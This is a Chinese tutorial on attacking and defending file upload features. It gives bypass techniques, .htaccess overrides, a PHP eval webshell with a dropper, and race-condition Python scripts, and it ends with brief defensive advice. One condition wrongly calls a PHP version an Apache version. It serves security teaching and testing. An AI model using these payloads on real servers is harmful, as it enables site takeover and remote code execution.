文件上传漏洞全面攻防指南<\/h1>

1. 基础测试流程<\/h2>

创建一个PHP测试文件，内容包含攻击语句<\/li>
上传该PHP文件到目标服务器<\/li>
访问上传文件的路径<\/li>

使用中国蚁剑等工具进行连接测试<\/li> <\/ol>

2. 前端校验绕过技术<\/h2>

2.1 文件后缀校验绕过<\/h3>

方法1：Burp Suite拦截修改<\/strong><\/p>

先上传合法后缀文件（如.png）<\/li>
使用Burp Suite抓包<\/li>
修改文件后缀为.php等可执行格式<\/li> <\/ul>
方法2：禁用JavaScript<\/strong><\/p>

直接禁用浏览器JavaScript功能<\/li>
绕过前端校验直接上传恶意文件<\/li> <\/ul>
2.2 MIME类型校验绕过<\/h3>
方法1：修改Content-Type<\/strong><\/p>

上传PHP文件<\/li>
修改Content-Type为合法图片类型：

image\/png<\/li>
image\/jpeg<\/li> <\/ul> <\/li> <\/ul>
方法2：后缀名修改<\/strong><\/p>

上传合法后缀文件（如.png）<\/li>
使用Burp Suite修改文件后缀为.php等可执行格式<\/li> <\/ul>
3. 黑名单绕过技术<\/h2>
3.1 非常规PHP后缀<\/h3>
在Apache配置允许的情况下，尝试以下后缀：<\/p>

php1, php2, php3, php4, php5<\/li>
phtml, pht, phps<\/li> <\/ul>
Apache配置修改<\/strong>：<\/p>
AddType application\/x-httpd-php .php3 .php4 .phtml .phps .php5 .pht <\/span><\/span><\/code><\/pre>3.2 Windows特性绕过<\/h3> ::$DATA流特性<\/strong>：<\/p> 上传文件名为test.php::$DATA<\/code><\/li> 访问时去掉::$DATA<\/code>部分<\/li> <\/ul> 3.3 .htaccess文件攻击<\/h3> 当服务器未过滤.htaccess文件时：<\/p> 上传.htaccess文件，内容示例：<\/li> <\/ol> <FilesMatch<\/span> "xxx.jpg"<\/span>><\/span> <\/span><\/span> SetHandler application\/x-httpd-php <\/span><\/span><\/FilesMatch><\/span> <\/span><\/span><\/code><\/pre>或<\/p> AddType application\/x-httpd-php .jpg <\/span><\/span><\/code><\/pre> 上传伪装为图片的PHP文件（如xxx.jpg）<\/li> 访问该"图片"文件将被解析为PHP<\/li> <\/ol> 3.4 其他黑名单绕过技巧<\/h3> 删除末尾点<\/strong>：<\/p> 上传test.php.<\/code>（服务器可能自动去除末尾点）<\/li> <\/ul> <\/li> 大小写混合<\/strong>：<\/p> Php, PhP, pHp等变体<\/li> <\/ul> <\/li> 空格绕过<\/strong>：<\/p> 文件后缀后加空格test.php <\/code><\/li> <\/ul> <\/li> 双写绕过<\/strong>：<\/p> test.pphphp<\/code>（过滤后变为test.php<\/code>）<\/li> <\/ul> <\/li> <\/ol> 4. 白名单绕过技术<\/h2> 4.1 %00截断（GET）<\/h3> 前提条件<\/strong>：<\/p> Apache版本≤5.2.17<\/li> magic_quotes_gpc=off<\/li> <\/ul> 操作步骤<\/strong>：<\/p> 上传s1.php<\/code>文件<\/li> 在路径参数中添加%00<\/code>截断：修改路径为s1.php%00<\/code><\/li> 文件名改为s1.png<\/code><\/li> <\/ul> <\/li> <\/ol> 4.2 十六进制00截断（POST）<\/h3> 操作步骤<\/strong>：<\/p> 在POST请求路径中添加s1.php+<\/code>（+号便于后续修改）<\/li> 切换到Hex视图，将+<\/code>的十六进制2b<\/code>改为00<\/code><\/li> 删除截断后的内容<\/li> <\/ol> 5. 图片马攻击<\/h2> 5.1 图片马制作方法<\/h3> 使用copy命令<\/strong>：<\/p> copy 77.png\/b + s1.php pass14.png <\/code><\/pre> 手动添加文件头<\/strong>：<\/p> GIF文件头：GIF89a<\/code><\/li> PNG文件头：PNG<\/code><\/li> JPG文件头：FF D8<\/code><\/li> BMP文件头：BM<\/code><\/li> <\/ul> 5.2 图片马利用条件<\/h3> 必须结合文件包含漏洞使用：<\/p> http:\/\/example.com\/include.php?file=upload\/2320250109221923.gif <\/code><\/pre> 5.3 文件内容比较<\/h3> 使用010 Editor等工具：<\/p> 比较上传前后文件差异<\/li> 将攻击代码插入不会被删除的位置<\/li> <\/ol> 6. 条件竞争攻击<\/h2> 6.1 攻击原理<\/h3> 当服务器采用以下流程时：<\/p> 先保存上传文件<\/li> 再进行后缀检查<\/li> 非法则删除<\/li> <\/ol> 利用文件保存到删除的时间差进行攻击。<\/p> 6.2 自动化攻击实现<\/h3> 步骤1：持续上传PHP文件<\/strong><\/p> <?<\/span>php<\/span> fputs<\/span>(fopen<\/span>('Tony.php'<\/span>,'w'<\/span>),'<?php @eval($_POST["cmd"]);?>'<\/span>);?><\/span> <\/span><\/span><\/span><\/code><\/pre>步骤2：Python脚本持续检测<\/strong><\/p> import<\/span> requests <\/span><\/span>url =<\/span> "http:\/\/target.com\/upload\/Tony.php"<\/span> <\/span><\/span>while<\/span> True<\/span>: <\/span><\/span> html =<\/span> requests.<\/span>get(url) <\/span><\/span> if<\/span> html.<\/span>status_code ==<\/span> 200<\/span>: <\/span><\/span> print("OK"<\/span>) <\/span><\/span> break<\/span> <\/span><\/span><\/code><\/pre>步骤3：蚁剑连接成功创建的Tony.php<\/strong><\/p> 6.3 图片马条件竞争<\/h3> 上传包含PHP代码的图片马<\/li> 持续访问包含该图片的文件：<\/li> <\/ol> import<\/span> requests <\/span><\/span>url =<\/span> "http:\/\/target.com\/include.php?file=upload\/221.gif"<\/span> <\/span><\/span>while<\/span> True<\/span>: <\/span><\/span> html =<\/span> requests.<\/span>get(url) <\/span><\/span> if<\/span> html.<\/span>status_code ==<\/span> 200<\/span>: <\/span><\/span> print("OK"<\/span>) <\/span><\/span> break<\/span> <\/span><\/span><\/code><\/pre>7. 其他高级技巧<\/h2> 7.1 文件名与内容分离校验<\/h3> 当服务器仅校验文件名而忽略文件内容时：<\/p> 上传扩展名为.png但内容为PHP代码的文件<\/li> 直接访问该"图片"文件<\/li> <\/ul> 7.2 move_uploaded_file特性<\/h3> 该函数会忽略文件末尾的\/.<\/code>：<\/p> 上传test.php\/.<\/code><\/li> 服务器实际保存为test.php<\/code><\/li> <\/ul> 8. 防御建议<\/h2> 使用白名单而非黑名单<\/li> 文件内容严格校验<\/li> 上传目录禁用执行权限<\/li> 随机化上传文件名<\/li> 文件类型检查使用MIME和内容双重验证<\/li> 设置文件大小限制<\/li> 对上传文件进行病毒扫描<\/li> 及时更新服务器软件<\/li> <\/ol> 9. 参考工具<\/h2> Burp Suite - 拦截修改HTTP请求<\/li> 中国蚁剑 - 网站管理工具<\/li> 010 Editor - 二进制文件分析<\/li> Python - 自动化攻击脚本编写<\/li> <\/ol> 通过掌握这些技术，安全人员可以全面测试文件上传功能的安全性，开发人员则可以据此加固系统防御。<\/p>